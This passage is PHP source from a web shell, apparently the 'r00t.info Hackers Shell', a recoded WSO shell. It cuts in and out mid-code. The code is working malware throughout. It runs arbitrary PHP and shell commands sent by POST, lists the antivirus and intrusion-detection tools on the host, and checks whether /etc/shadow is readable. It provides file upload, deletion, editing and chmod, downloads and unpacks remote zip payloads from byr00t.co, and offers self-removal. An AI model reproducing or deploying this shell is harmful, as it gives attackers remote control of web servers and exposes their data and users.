array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = 
"document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) 
echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = 
@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, 
array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden 
name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => 
\'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n 
header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n 
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= 
\' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? 
e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n 
<!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
